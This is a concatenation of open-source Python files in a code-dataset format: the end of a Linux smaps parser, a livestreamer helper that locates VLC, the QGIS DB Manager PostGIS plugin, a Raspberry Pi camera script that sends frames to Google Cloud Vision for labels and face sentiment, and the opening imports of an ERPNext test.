VmFlags: rd mr mw me sd"""
has_header = is_memory_region_header(lines[0])
if has_header:
region = parse_smaps_header(lines[0])
if region.name == '[vsyscall]':
return None
lines = lines[1:]
else:
region = MemoryRegion(free=False)
region.pid = pid
global _smaps_string_mappings
for line in lines:
util.LOGGER.debug('Parsing line: %s' % line)
parts = re.split('[ :]+', line.strip())
if len(parts) < 2:
util.LOGGER.debug('Skipping smaps line that is too short: %s' % line)
elif 'Size' == parts[0]:
# We calculate the size from the address ranges instead.
pass
elif 'VmFlags' == parts[0]:
region.vm_flags = parts[1:]
else:
# All other lines should be an amount of some type of memory.
try:
region.__dict__[util.camel_case_to_underscore(parts[0])] = int(parts[1]) * 1024
except KeyError:
util.LOGGER.warn("Line not recognised: '%s'" % line)
return region
| apache-2.0 |
flijloku/livestreamer | src/livestreamer_cli/utils/player.py | 23 | 1244 | import os
import sys
from ..compat import shlex_quote
def check_paths(exes, paths):
for path in paths:
for exe in exes:
path = os.path.expanduser(os.path.join(path, exe))
if os.path.isfile(path):
return path
def find_default_player():
if "darwin" in sys.platform:
paths = os.environ.get("PATH", "").split(":")
paths += ["/Applications/VLC.app/Contents/MacOS/"]
paths += ["~/Applications/VLC.app/Contents/MacOS/"]
path = check_paths(("VLC", "vlc"), paths)
elif "win32" in sys.platform:
exename = "vlc.exe"
paths = os.environ.get("PATH", "").split(";")
path = check_paths((exename,), paths)
if not path:
subpath = "VideoLAN\\VLC\\"
envvars = ("PROGRAMFILES", "PROGRAMFILES(X86)", "PROGRAMW6432")
paths = filter(None, (os.environ.get(var) for var in envvars))
paths = (os.path.join(p, subpath) for p in paths)
path = check_paths((exename,), paths)
else:
paths = os.environ.get("PATH", "").split(":")
path = check_paths(("vlc",), paths)
if path:
# Quote command because it can contain space
return shlex_quote(path)
| bsd-2-clause |
dmarteau/QGIS | python/plugins/db_manager/db_plugins/postgis/plugin.py | 25 | 17115 | # -*- coding: utf-8 -*-
"""
/***************************************************************************
Name : DB Manager
Description : Database manager plugin for QGIS
Date : May 23, 2011
copyright : (C) 2011 by Giuseppe Sucameli
email : [email protected]
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
"""
from builtins import str
from builtins import map
from builtins import range
# this will disable the dbplugin if the connector raise an ImportError
from .connector import PostGisDBConnector
from qgis.PyQt.QtCore import Qt, QRegExp, QCoreApplication
from qgis.PyQt.QtGui import QIcon
from qgis.PyQt.QtWidgets import QAction, QApplication, QMessageBox
from qgis.core import Qgis, QgsApplication, QgsSettings
from qgis.gui import QgsMessageBar
from ..plugin import ConnectionError, InvalidDataException, DBPlugin, Database, Schema, Table, VectorTable, RasterTable, \
TableField, TableConstraint, TableIndex, TableTrigger, TableRule
import re
def classFactory():
return PostGisDBPlugin
class PostGisDBPlugin(DBPlugin):
@classmethod
def icon(self):
return QgsApplication.getThemeIcon("/mIconPostgis.svg")
@classmethod
def typeName(self):
return 'postgis'
@classmethod
def typeNameString(self):
return QCoreApplication.translate('db_manager', 'PostGIS')
@classmethod
def providerName(self):
return 'postgres'
@classmethod
def connectionSettingsKey(self):
return '/PostgreSQL/connections'
def databasesFactory(self, connection, uri):
return PGDatabase(connection, uri)
def connect(self, parent=None):
conn_name = self.connectionName()
settings = QgsSettings()
settings.beginGroup(u"/%s/%s" % (self.connectionSettingsKey(), conn_name))
if not settings.contains("database"): # non-existent entry?
raise InvalidDataException(self.tr('There is no defined database connection "{0}".').format(conn_name))
from qgis.core import QgsDataSourceUri
uri = QgsDataSourceUri()
settingsList = ["service", "host", "port", "database", "username", "password", "authcfg"]
service, host, port, database, username, password, authcfg = [settings.value(x, "", type=str) for x in settingsList]
useEstimatedMetadata = settings.value("estimatedMetadata", False, type=bool)
try:
sslmode = settings.enumValue("sslmode", QgsDataSourceUri.SslPrefer)
except TypeError:
sslmode = QgsDataSourceUri.SslPrefer
settings.endGroup()
if hasattr(authcfg, 'isNull') and authcfg.isNull():
authcfg = ''
if service:
uri.setConnection(service, database, username, password, sslmode, authcfg)
else:
uri.setConnection(host, port, database, username, password, sslmode, authcfg)
uri.setUseEstimatedMetadata(useEstimatedMetadata)
try:
return self.connectToUri(uri)
except ConnectionError:
return False
class PGDatabase(Database):
def __init__(self, connection, uri):
Database.__init__(self, connection, uri)
def connectorsFactory(self, uri):
return PostGisDBConnector(uri, self.connection())
def dataTablesFactory(self, row, db, schema=None):
return PGTable(row, db, schema)
def info(self):
from .info_model import PGDatabaseInfo
return PGDatabaseInfo(self)
def vectorTablesFactory(self, row, db, schema=None):
return PGVectorTable(row, db, schema)
def rasterTablesFactory(self, row, db, schema=None):
return PGRasterTable(row, db, schema)
def schemasFactory(self, row, db):
return PGSchema(row, db)
def sqlResultModel(self, sql, parent):
from .data_model import PGSqlResultModel
return PGSqlResultModel(self, sql, parent)
def sqlResultModelAsync(self, sql, parent):
from .data_model import PGSqlResultModelAsync
return PGSqlResultModelAsync(self, sql, parent)
def registerDatabaseActions(self, mainWindow):
Database.registerDatabaseActions(self, mainWindow)
# add a separator
separator = QAction(self)
separator.setSeparator(True)
mainWindow.registerAction(separator, self.tr("&Table"))
action = QAction(self.tr("Run &Vacuum Analyze"), self)
mainWindow.registerAction(action, self.tr("&Table"), self.runVacuumAnalyzeActionSlot)
action = QAction(self.tr("Run &Refresh Materialized View"), self)
mainWindow.registerAction(action, self.tr("&Table"), self.runRefreshMaterializedViewSlot)
def runVacuumAnalyzeActionSlot(self, item, action, parent):
QApplication.restoreOverrideCursor()
try:
if not isinstance(item, Table) or item.isView:
parent.infoBar.pushMessage(self.tr("Select a table for vacuum analyze."), Qgis.Info,
parent.iface.messageTimeout())
return
finally:
QApplication.setOverrideCursor(Qt.WaitCursor)
item.runVacuumAnalyze()
def runRefreshMaterializedViewSlot(self, item, action, parent):
QApplication.restoreOverrideCursor()
try:
if not isinstance(item, PGTable) or item._relationType != 'm':
parent.infoBar.pushMessage(self.tr("Select a materialized view for refresh."), Qgis.Info,
parent.iface.messageTimeout())
return
finally:
QApplication.setOverrideCursor(Qt.WaitCursor)
item.runRefreshMaterializedView()
def hasLowercaseFieldNamesOption(self):
return True
def supportsComment(self):
return True
def executeSql(self, sql):
return self.connector._executeSql(sql)
class PGSchema(Schema):
def __init__(self, row, db):
Schema.__init__(self, db)
self.oid, self.name, self.owner, self.perms, self.comment = row
class PGTable(Table):
def __init__(self, row, db, schema=None):
Table.__init__(self, db, schema)
self.name, schema_name, self._relationType, self.owner, self.estimatedRowCount, self.pages, self.comment = row
self.isView = self._relationType in set(['v', 'm'])
self.estimatedRowCount = int(self.estimatedRowCount)
def runVacuumAnalyze(self):
self.aboutToChange.emit()
self.database().connector.runVacuumAnalyze((self.schemaName(), self.name))
# TODO: change only this item, not re-create all the tables in the schema/database
self.schema().refresh() if self.schema() else self.database().refresh()
def runRefreshMaterializedView(self):
self.aboutToChange.emit()
self.database().connector.runRefreshMaterializedView((self.schemaName(), self.name))
# TODO: change only this item, not re-create all the tables in the schema/database
self.schema().refresh() if self.schema() else self.database().refresh()
def runAction(self, action):
action = str(action)
if action.startswith("vacuumanalyze/"):
if action == "vacuumanalyze/run":
self.runVacuumAnalyze()
return True
elif action.startswith("rule/"):
parts = action.split('/')
rule_name = parts[1]
rule_action = parts[2]
msg = self.tr(u"Do you want to {0} rule {1}?").format(rule_action, rule_name)
QApplication.restoreOverrideCursor()
try:
if QMessageBox.question(None, self.tr("Table rule"), msg,
QMessageBox.Yes | QMessageBox.No) == QMessageBox.No:
return False
finally:
QApplication.setOverrideCursor(Qt.WaitCursor)
if rule_action == "delete":
self.aboutToChange.emit()
self.database().connector.deleteTableRule(rule_name, (self.schemaName(), self.name))
self.refreshRules()
return True
elif action.startswith("refreshmaterializedview/"):
if action == "refreshmaterializedview/run":
self.runRefreshMaterializedView()
return True
return Table.runAction(self, action)
def tableFieldsFactory(self, row, table):
return PGTableField(row, table)
def tableConstraintsFactory(self, row, table):
return PGTableConstraint(row, table)
def tableIndexesFactory(self, row, table):
return PGTableIndex(row, table)
def tableTriggersFactory(self, row, table):
return PGTableTrigger(row, table)
def tableRulesFactory(self, row, table):
return PGTableRule(row, table)
def info(self):
from .info_model import PGTableInfo
return PGTableInfo(self)
def crs(self):
return self.database().connector.getCrs(self.srid)
def tableDataModel(self, parent):
from .data_model import PGTableDataModel
return PGTableDataModel(self, parent)
def delete(self):
self.aboutToChange.emit()
if self.isView:
ret = self.database().connector.deleteView((self.schemaName(), self.name), self._relationType == 'm')
else:
ret = self.database().connector.deleteTable((self.schemaName(), self.name))
if not ret:
self.deleted.emit()
return ret
class PGVectorTable(PGTable, VectorTable):
def __init__(self, row, db, schema=None):
PGTable.__init__(self, row[:-4], db, schema)
VectorTable.__init__(self, db, schema)
self.geomColumn, self.geomType, self.geomDim, self.srid = row[-4:]
def info(self):
from .info_model import PGVectorTableInfo
return PGVectorTableInfo(self)
def runAction(self, action):
if PGTable.runAction(self, action):
return True
return VectorTable.runAction(self, action)
class PGRasterTable(PGTable, RasterTable):
def __init__(self, row, db, schema=None):
PGTable.__init__(self, row[:-6], db, schema)
RasterTable.__init__(self, db, schema)
self.geomColumn, self.pixelType, self.pixelSizeX, self.pixelSizeY, self.isExternal, self.srid = row[-6:]
self.geomType = 'RASTER'
def info(self):
from .info_model import PGRasterTableInfo
return PGRasterTableInfo(self)
def uri(self, uri=None):
"""Returns the datasource URI for postgresraster provider"""
if not uri:
uri = self.database().uri()
service = (u'service=\'%s\'' % uri.service()) if uri.service() else ''
dbname = (u'dbname=\'%s\'' % uri.database()) if uri.database() else ''
host = (u'host=%s' % uri.host()) if uri.host() else ''
user = (u'user=%s' % uri.username()) if uri.username() else ''
passw = (u'password=%s' % uri.password()) if uri.password() else ''
port = (u'port=%s' % uri.port()) if uri.port() else ''
schema = self.schemaName() if self.schemaName() else 'public'
table = '"%s"."%s"' % (schema, self.name)
if not dbname:
# postgresraster provider *requires* a dbname
connector = self.database().connector
r = connector._execute(None, "SELECT current_database()")
dbname = (u'dbname=\'%s\'' % connector._fetchone(r)[0])
connector._close_cursor(r)
# Find first raster field
col = ''
for fld in self.fields():
if fld.dataType == "raster":
col = u'column=\'%s\'' % fld.name
break
uri = u'%s %s %s %s %s %s %s table=%s' % \
(service, dbname, host, user, passw, port, col, table)
return uri
def mimeUri(self):
uri = u"raster:postgresraster:{}:{}".format(self.name, re.sub(":", r"\:", self.uri()))
return uri
def toMapLayer(self):
from qgis.core import QgsRasterLayer, QgsContrastEnhancement, QgsDataSourceUri, QgsCredentials
rl = QgsRasterLayer(self.uri(), self.name, "postgresraster")
if not rl.isValid():
err = rl.error().summary()
uri = QgsDataSourceUri(self.database().uri())
conninfo = uri.connectionInfo(False)
username = uri.username()
password = uri.password()
for i in range(3):
(ok, username, password) = QgsCredentials.instance().get(conninfo, username, password, err)
if ok:
uri.setUsername(username)
uri.setPassword(password)
rl = QgsRasterLayer(self.uri(uri), self.name)
if rl.isValid():
break
if rl.isValid():
rl.setContrastEnhancement(QgsContrastEnhancement.StretchToMinimumMaximum)
return rl
class PGTableField(TableField):
def __init__(self, row, table):
TableField.__init__(self, table)
self.num, self.name, self.dataType, self.charMaxLen, self.modifier, self.notNull, self.hasDefault, self.default, typeStr = row
self.primaryKey = False
# get modifier (e.g. "precision,scale") from formatted type string
trimmedTypeStr = typeStr.strip()
regex = QRegExp("\\((.+)\\)$")
startpos = regex.indexIn(trimmedTypeStr)
if startpos >= 0:
self.modifier = regex.cap(1).strip()
else:
self.modifier = None
# find out whether fields are part of primary key
for con in self.table().constraints():
if con.type == TableConstraint.TypePrimaryKey and self.num in con.columns:
self.primaryKey = True
break
def getComment(self):
"""Returns the comment for a field"""
tab = self.table()
# SQL Query checking if a comment exists for the field
sql_cpt = "Select count(*) from pg_description pd, pg_class pc, pg_attribute pa where relname = '%s' and attname = '%s' and pa.attrelid = pc.oid and pd.objoid = pc.oid and pd.objsubid = pa.attnum" % (tab.name, self.name)
# SQL Query that return the comment of the field
sql = "Select pd.description from pg_description pd, pg_class pc, pg_attribute pa where relname = '%s' and attname = '%s' and pa.attrelid = pc.oid and pd.objoid = pc.oid and pd.objsubid = pa.attnum" % (tab.name, self.name)
c = tab.database().connector._execute(None, sql_cpt) # Execute Check query
res = tab.database().connector._fetchone(c)[0] # Store result
if res == 1:
# When a comment exists
c = tab.database().connector._execute(None, sql) # Execute query
res = tab.database().connector._fetchone(c)[0] # Store result
tab.database().connector._close_cursor(c) # Close cursor
return res # Return comment
else:
return ''
class PGTableConstraint(TableConstraint):
def __init__(self, row, table):
TableConstraint.__init__(self, table)
self.name, constr_type_str, self.isDefferable, self.isDeffered, columns = row[:5]
self.columns = list(map(int, columns.split(' ')))
if constr_type_str in TableConstraint.types:
self.type = TableConstraint.types[constr_type_str]
else:
self.type = TableConstraint.TypeUnknown
if self.type == TableConstraint.TypeCheck:
self.checkSource = row[5]
elif self.type == TableConstraint.TypeForeignKey:
self.foreignTable = row[6]
self.foreignOnUpdate = TableConstraint.onAction[row[7]]
self.foreignOnDelete = TableConstraint.onAction[row[8]]
self.foreignMatchType = TableConstraint.matchTypes[row[9]]
self.foreignKeys = row[10]
class PGTableIndex(TableIndex):
def __init__(self, row, table):
TableIndex.__init__(self, table)
self.name, columns, self.isUnique = row
self.columns = list(map(int, columns.split(' ')))
class PGTableTrigger(TableTrigger):
def __init__(self, row, table):
TableTrigger.__init__(self, table)
self.name, self.function, self.type, self.enabled = row
class PGTableRule(TableRule):
def __init__(self, row, table):
TableRule.__init__(self, table)
self.name, self.definition = row
| gpl-2.0 |
raygeeknyc/ohgee | visionanalyzer.py | 1 | 19670 | #!/usr/bin/python3
import logging
# Used only if this is run as main
_DEBUG = logging.DEBUG
SENTIMENT_CONFIDENCE_THRESHOLD = 0.25
GOOD_SENTIMENT_THRESHOLD = SENTIMENT_CONFIDENCE_THRESHOLD
BAD_SENTIMENT_THRESHOLD = -1*SENTIMENT_CONFIDENCE_THRESHOLD
# Import the packages we need for drawing and displaying images
from PIL import Image, ImageDraw
# Imports the Google Cloud client packages we need
from google.cloud import vision
# Enumerate the likelihood names that are defined by Cloud Vision 1
LIKELIHOOD_NAMES = {'UNKNOWN':0, 'VERY_UNLIKELY':1, 'UNLIKELY':2, 'POSSIBLE':3,
'LIKELY':4, 'VERY_LIKELY':5}
from picamera import PiCamera
import multiprocessing
from multiprocessingloghandler import ParentMultiProcessingLogHandler
from multiprocessingloghandler import ChildMultiProcessingLogHandler
from random import randint
import io
import sys
import os
import time
import signal
import queue
import threading
# This is the desired resolution of the Pi camera
RESOLUTION = (600, 400)
CAPTURE_RATE_FPS = 2
# This is over an observed covered camera's noise
TRAINING_SAMPLES = 5
# This is how much the green channel has to change to consider a pixel changed
PIXEL_SHIFT_SENSITIVITY = 30
# This is the portion of pixels to compare when detecting motion
MOTION_DETECT_SAMPLE = 1.0/20 # so... 5%? (Kudos to Sarah Cooper)
# This is how long to sleep in various threads between shutdown checks
POLL_SECS = 0.1
# This is the rate at which to send frames to the vision service
ANALYSIS_RATE_FPS = 1
_ANALYSIS_DELAY_SECS = 1.0/ANALYSIS_RATE_FPS
COLOR_MEH = (0, 0, 127)
COLOR_BAD = (200, 0, 0)
COLOR_GOOD = (0, 200, 0)
COLOR_FEATURES = (255,255,255)
def signal_handler(sig, frame):
global STOP
if STOP:
signal.signal(signal.SIGINT, signal.SIG_IGN)
os.kill(os.getpid(), signal.SIGTERM)
logging.debug("SIGINT")
STOP = True
signal.signal(signal.SIGINT, signal_handler)
EMPTY_LABELS = []
BAD_MOOD_GREETINGS = (["don't", "worry", "be", "happy"], ["I'm", "sorry", "that", "you're", "not", "feeling", "happy"], ["You", "look", "down"], ["I", "hope", "that", "I", "can", "cheer", "you", "up"], ["I", "hope", "that", "you", "feel", "better", "soon"], ["Smile!"])
GOOD_MOOD_GREETINGS = (["I'm", "glad", "that", "you", "are", "happy"], ["You", "look", "happy"], ["You", "cheer", "me", "up"], ["It's", "great", "to", "see", "you", "happy"], ["Great", "day"])
DOG_LABELS = ["dog", "canine"]
DOG_GREETINGS = (["here", "doggie"], ["hi","puppy"], ["hello", "puppy"], ["woof", "woof"], ["bark", "bark"], ["good", "puppy"], ["good", "puppy"], ["nice", "doggie"])
CAT_LABELS = ["cat", "feline"]
CAT_GREETINGS = (["meow"], ["meow", "meow"], ["nice", "kitty"], ["what", "a", "nice", "cat"])
HAT_LABELS = ["hat", "cap", "headgear"]
HAT_GREETINGS = (["that's", "a", "nice", "hat"], ["nice", "hat"], ["nice", "cap"], ["I", "like", "your", "hat"])
COFFEE_LABELS = ["espresso", "cup", "mug", "coffee", "coffee cup", "drinkware"]
COFFEE_GREETINGS = (["is", "that", "a", "cup", "of", "good", "coffee"], ["I", "love", "coffee", "too"], ["I", "hope", "that", "you", "enjoy", "your", "coffee"])
EYEGLASS_LABELS = ["glasses", "eyewear"]
EYEGLASS_GREETINGS = (["those", "are", "nice", "eye", "glasses"], ["I", "like", "your", "glasses"], ["nice", "glasses"], ["nice", "eye", "glasses"], [], [], [], [])
FLOWER_LABELS = ["flowers", "flower", "floral"]
FLOWER_GREETINGS = (["what", "a", "pretty", "flower"], ["nice", "flowers"], [])
# Only the first label found in tags will be used, so prioritize them in this list
LABELS_GREETINGS = [(DOG_LABELS, DOG_GREETINGS, EMPTY_LABELS, True),
(CAT_LABELS, CAT_GREETINGS, EMPTY_LABELS, False),
(HAT_LABELS, HAT_GREETINGS, EMPTY_LABELS, False),
(FLOWER_LABELS, FLOWER_GREETINGS, EMPTY_LABELS, False),
(COFFEE_LABELS, COFFEE_GREETINGS, EMPTY_LABELS, False),
(EYEGLASS_LABELS, EYEGLASS_GREETINGS, EMPTY_LABELS, False)]
def randomGreetingFrom(phrases):
if not phrases: return []
return phrases[randint(0,len(phrases)-1)]
def getBadMoodGreeting():
return (randomGreetingFrom(BAD_MOOD_GREETINGS), False)
def getGoodMoodGreeting():
return (randomGreetingFrom(GOOD_MOOD_GREETINGS), False)
# Return the first label of the set that a match was found in
# but a match was not found in excludes
def getGreetingForLabels(labels):
for tags, greetings, excludes, wave_flag in LABELS_GREETINGS:
for label in labels:
logging.debug("label: {}".format(label))
matched_label_text = labelMatch(labels, tags)
if matched_label_text:
matched_exclude = labelMatch(labels, excludes)
if not matched_exclude:
return (randomGreetingFrom(greetings), wave_flag, tags[0])
return None
def labelMatch(labels,tags):
for candidate_label in labels:
if candidate_label in tags:
return candidate_label
return None
# Sentiment is -1, 0 or +1 for this sentiment and level
# -1 == bad, 0 == meh, +1 == good
def getSentimentForLevel(face, level):
if face.joy_likelihood == level or face.surprise_likelihood == level:
logging.debug("getSentimentForLevel: %s joy: %s surprise: %s" % (str(level), str(face.joy_likelihood), str(face.surprise_likelihood)))
return 1.0
if face.anger_likelihood == level or face.sorrow_likelihood == level:
logging.debug("getSentimentForLevel: %s anger: %s sorrow: %s" % (str(level), str(face.anger_likelihood), str(face.sorrow_likelihood)))
return -1.0
return 0.0
def getSentimentWeightedByLevel(face):
logging.debug("joy: {}, surprise:{}, anger:{}, sorrow:{}".format(
face.joy_likelihood, face.surprise_likelihood, face.anger_likelihood, face.sorrow_likelihood))
sentiment = getSentimentForLevel(face, LIKELIHOOD_NAMES['VERY_LIKELY'])
if sentiment != 0:
return sentiment
sentiment = getSentimentForLevel(face, LIKELIHOOD_NAMES['LIKELY'])
if sentiment != 0:
return sentiment * SENTIMENT_CONFIDENCE_THRESHOLD
sentiment = getSentimentForLevel(face, LIKELIHOOD_NAMES['POSSIBLE'])
if sentiment != 0:
return sentiment * SENTIMENT_CONFIDENCE_THRESHOLD
sentiment = getSentimentForLevel(face, LIKELIHOOD_NAMES['UNLIKELY'])
if sentiment != 0:
return sentiment * 0.25
return 0.0
class ImageAnalyzer(multiprocessing.Process):
def __init__(self, vision_queue, log_queue, logging_level):
multiprocessing.Process.__init__(self)
self._log_queue = log_queue
self._logging_level = logging_level
self._exit = multiprocessing.Event()
self._vision_queue, _ = vision_queue
self._stop_capturing = False
self._stop_analyzing = False
self._last_frame_at = 0.0
self._frame_delay_secs = 1.0/CAPTURE_RATE_FPS
def stop(self):
logging.debug("***analysis received shutdown")
self._exit.set()
def _initLogging(self):
handler = ChildMultiProcessingLogHandler(self._log_queue)
logging.getLogger(str(os.getpid())).addHandler(handler)
logging.getLogger(str(os.getpid())).setLevel(self._logging_level)
def capturePilFrame(self):
s=time.time()
self._image_buffer.seek(0)
self._camera.capture(self._image_buffer, format="jpeg", use_video_port=True)
self._image_buffer.seek(0)
image = Image.open(self._image_buffer)
image_pixels = image.load()
image = self._image_buffer.getvalue()
self._last_frame_at = time.time()
logging.debug("capturePilFrame took {}".format(time.time()-s))
return (image, image_pixels)
def getNextFrame(self):
delay = (self._last_frame_at + self._frame_delay_secs) - time.time()
if delay > 0:
time.sleep(delay)
self._current_frame = self.capturePilFrame()
def calculateImageDifference(self, change_threshold=None, sample_percentage=MOTION_DETECT_SAMPLE):
"""
Detect changes in the green channel.
Sample sample_percentage of pixels, evenly distributed throughout
the image's pixel map.
If change_threshold is specified, exit once it's reached.
"""
s = time.time()
changed_pixels = 0
sample_size = sample_percentage * self._camera.resolution[0] * self._camera.resolution[1]
step_size = self._camera.resolution[0] * self._camera.resolution[1] / sample_size
# We choose the "most square" sampling interval to avoid sampling one or few stripes
if self._camera.resolution[0] < self._camera.resolution[1]:
y_step = int(sample_size / self._camera.resolution[0])
x_step = 1
else:
x_step = int(sample_size / self._camera.resolution[0])
y_step = 1
logging.debug("Motion threshold, pct, size, step_size, x_step, y_step: {},{},{},{},{},{}".format(change_threshold, sample_percentage, sample_size, step_size, x_step, y_step))
samples = 0
for x in range(0, self._camera.resolution[0], x_step):
for y in range(0, self._camera.resolution[1], y_step):
samples += 1
if abs(self._current_frame[1][x,y][1] - self._prev_frame[1][x,y][1]) > PIXEL_SHIFT_SENSITIVITY:
changed_pixels += 1
if change_threshold and changed_pixels > change_threshold:
logging.debug("reached threshold: {}, {} secs".format(changed_pixels, time.time()-s))
return changed_pixels
logging.debug("calculated change: {}, {} secs".format(changed_pixels, time.time()-s))
return changed_pixels
def imageDifferenceOverThreshold(self, changed_pixels_threshold):
"Are there more changed pixels than we've established as a lower bound for motion?"
changed_pixels = self.calculateImageDifference(changed_pixels_threshold)
return changed_pixels > changed_pixels_threshold
def trainMotion(self):
logging.debug("Training motion")
trained = False
try:
self._camera.start_preview(fullscreen=False, window=(100,100,self._camera.resolution[0], self._camera.resolution[1]))
self._motion_threshold = 9999
self.getNextFrame()
for i in range(TRAINING_SAMPLES):
self._prev_frame = self._current_frame
self.getNextFrame()
motion = self.calculateImageDifference()
self._motion_threshold = min(motion, self._motion_threshold)
trained = True
finally:
self._camera.stop_preview()
logging.debug("Trained {}".format(trained))
return trained
def run(self):
self._initLogging()
try:
self._frames = queue.Queue()
self._stop_capturing = False
self._stop_analyzing = False
self._capturer = threading.Thread(target=self.captureFrames)
self._capturer.start()
self._analyzer = threading.Thread(target=self.analyzeVision)
self._analyzer.start()
while not self._exit.is_set():
time.sleep(POLL_SECS)
logging.debug("Shutting down threads")
self._stop_capturing = True
self._capturer.join()
self._stop_analyzing = True
self._analyzer.join()
except Exception:
logging.exception("Error in vision main thread")
finally:
logging.debug("Exiting vision")
sys.exit(0)
def analyzeVision(self):
self._vision_client = vision.ImageAnnotatorClient()
skipped_images = 0
frame = None
while not self._stop_analyzing:
try:
frame = self._frames.get(block=False)
skipped_images += 1
except queue.Empty:
if not frame:
logging.debug("Empty image queue, waiting")
skipped_images = 0
time.sleep(POLL_SECS)
else:
skipped_images -= 1
logging.debug("Trailing frame read, skipped {} frames".format(skipped_images))
try:
results = self._analyzeFrame(frame)
buffer = io.BytesIO()
results[0].save(buffer, format="JPEG")
buffer.seek(0)
img_bytes = buffer.getvalue()
logging.debug("send image %s" % type(img_bytes))
self._vision_queue.send((img_bytes, results[1], results[2], results[3], results[4]))
except Exception:
logging.exception("error reading image")
finally:
frame = None
self._vision_queue.close()
logging.debug("Exiting vision analyze thread")
def _analyzeFrame(self, frame):
s=time.time()
logging.debug("analyzing image")
remote_image = vision.Image(content=frame[0])
labels = self._vision_client.label_detection(image=remote_image).label_annotations
faces = self._vision_client.face_detection(image=remote_image, image_context=None,
max_results=2).face_annotations
faces_details = findFacesDetails(faces)
im = Image.open(io.BytesIO(frame[0]))
size = im.size[0] * im.size[1]
canvas = ImageDraw.Draw(im)
obscureFacesWithSentiments(canvas, faces_details)
strongest_sentiment = 0.0
max_confidence = 0.0
max_area = 0.0
for face_detail in faces_details:
if face_detail[3] > max_area:
max_area = face_detail[3]
if face_detail[2] > max_confidence:
max_confidence = face_detail[2]
strongest_sentiment = face_detail[0]
logging.debug("sentiment:{}".format(strongest_sentiment))
logging.debug("_analyzeFrame took {}".format(time.time()-s))
max_area_portion = (max_area * 1.0) / size
label_descriptions = [label.description for label in labels]
return (im, label_descriptions, faces_details, strongest_sentiment, max_area_portion)
def captureFrames(self):
self._image_buffer = io.BytesIO()
self._camera = PiCamera()
self._camera.resolution = RESOLUTION
self._camera.vflip = True
prev_array = None
logging.info("Training motion detection")
for retry in range(3):
if self.trainMotion():
break
logging.info("Trained motion detection {}".format(self._motion_threshold))
while not self._stop_capturing:
try:
self.getNextFrame()
if self.imageDifferenceOverThreshold(self._motion_threshold):
logging.debug("Motion detected")
self._frames.put(self._current_frame)
self._prev_frame = self._current_frame
self.getNextFrame()
except Exception as e:
logging.error("Error in analysis: {}".format(e))
logging.debug("Exiting vision capture thread")
self._camera.close()
def findFacesDetails(faces):
faces_details = []
if faces:
for face in faces:
top = 9999
left = 9999
bottom = 0
right = 0
for point in face.bounding_poly.vertices:
top = min(top, point.y)
left = min(left, point.x)
bottom = max(bottom, point.y)
right = max(right, point.x)
sentiment = getSentimentWeightedByLevel(face)
area = abs(bottom - top) * abs(right - left)
faces_details.append((sentiment, ((left, top), (right, bottom)), face.detection_confidence, area))
return faces_details
def getColorForSentiment(sentiment):
if sentiment < 0:
return COLOR_BAD
if sentiment > 0:
return COLOR_GOOD
return COLOR_MEH
def watchForResults(vision_results_queue):
global STOP
_, incoming_results = vision_results_queue
try:
while True:
image, labels, faces_details, sentiment, max_area_portion = incoming_results.recv()
logging.debug("{} faces detected".format(len(faces_details)))
for label in labels:
logging.debug("label: {}".format(label))
except EOFError:
logging.debug("Done watching")
def obscureFacesWithSentiments(canvas, faces_details):
for face_sentiment, face_boundary, _, _ in faces_details:
sentiment_color = getColorForSentiment(face_sentiment)
canvas.ellipse(face_boundary, fill=sentiment_color, outline=None)
eye_size = max(1, (face_boundary[1][0] - face_boundary[0][0]) / 50)
nose_size = 2*eye_size
eye_level = face_boundary[0][1] + (face_boundary[1][1] - face_boundary[0][1])/3.0
nose_level = face_boundary[0][1] + (face_boundary[1][1] - face_boundary[0][1])/2.0
mouth_size_h = (face_boundary[1][0] - face_boundary[0][0])/2.0
mouth_size_v = (face_boundary[1][1] - nose_level)/2.0
mouth_size = min(mouth_size_v, mouth_size_h)
mouth_inset = ((face_boundary[1][0]-face_boundary[0][0])-mouth_size)/2
canvas.ellipse((face_boundary[0][0]+((face_boundary[1][0] - face_boundary[0][0])/3.0)-eye_size, eye_level-eye_size, face_boundary[0][0]+((face_boundary[1][0]-face_boundary[0][0])/3.0)+eye_size, eye_level + eye_size), None, outline=COLOR_FEATURES)
canvas.ellipse((face_boundary[0][0]+((face_boundary[1][0] - face_boundary[0][0])/3.0)*2-eye_size, eye_level-eye_size, face_boundary[0][0]+((face_boundary[1][0] - face_boundary[0][0])/3.0)*2+eye_size, eye_level+eye_size), None, outline=COLOR_FEATURES)
canvas.ellipse((face_boundary[0][0]+((face_boundary[1][0] - face_boundary[0][0])/2.0)-nose_size, nose_level-nose_size, face_boundary[0][0]+((face_boundary[1][0] - face_boundary[0][0])/2.0)+nose_size, nose_level+nose_size), outline=COLOR_FEATURES, fill=COLOR_FEATURES)
if sentiment_color == COLOR_GOOD:
canvas.chord(( face_boundary[0][0]+mouth_inset, nose_level, face_boundary[0][0]+mouth_inset+mouth_size, nose_level+mouth_size), 35, 135, fill=COLOR_FEATURES, outline=COLOR_FEATURES)
elif sentiment_color == COLOR_BAD:
canvas.chord(( face_boundary[0][0]+mouth_inset, face_boundary[1][1]-(face_boundary[1][1]-nose_level)*0.67, face_boundary[0][0]+mouth_inset+mouth_size, face_boundary[1][1]), 215, 335, fill=COLOR_FEATURES, outline=COLOR_FEATURES)
if __name__ == '__main__':
global STOP
STOP = False
log_stream = sys.stderr
log_queue = multiprocessing.Queue(100)
handler = ParentMultiProcessingLogHandler(logging.StreamHandler(log_stream), log_queue)
logging.getLogger('').addHandler(handler)
logging.getLogger('').setLevel(_DEBUG)
vision_results_queue = multiprocessing.Pipe()
vision_worker = ImageAnalyzer(vision_results_queue, log_queue, logging.getLogger('').getEffectiveLevel())
try:
logging.debug("Starting image analysis")
vision_worker.start()
unused, _ = vision_results_queue
unused.close()
watcher = threading.Thread(target = watchForResults, args=(vision_results_queue,))
watcher.start()
while not STOP:
time.sleep(POLL_SECS)
except Exception:
logging.exception("Main exception")
finally:
logging.debug("Ending")
vision_worker.stop()
vision_worker.join()
logging.debug("background process returned, exiting main process")
sys.exit(0)
| gpl-3.0 |
neilLasrado/erpnext | erpnext/accounts/doctype/journal_entry/test_journal_entry.py | 14 | 11145 | # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import unittest, frappe
from frappe.utils import flt, nowdate
from erpnext.accounts.doctype.account.test_account import get_inventory_account
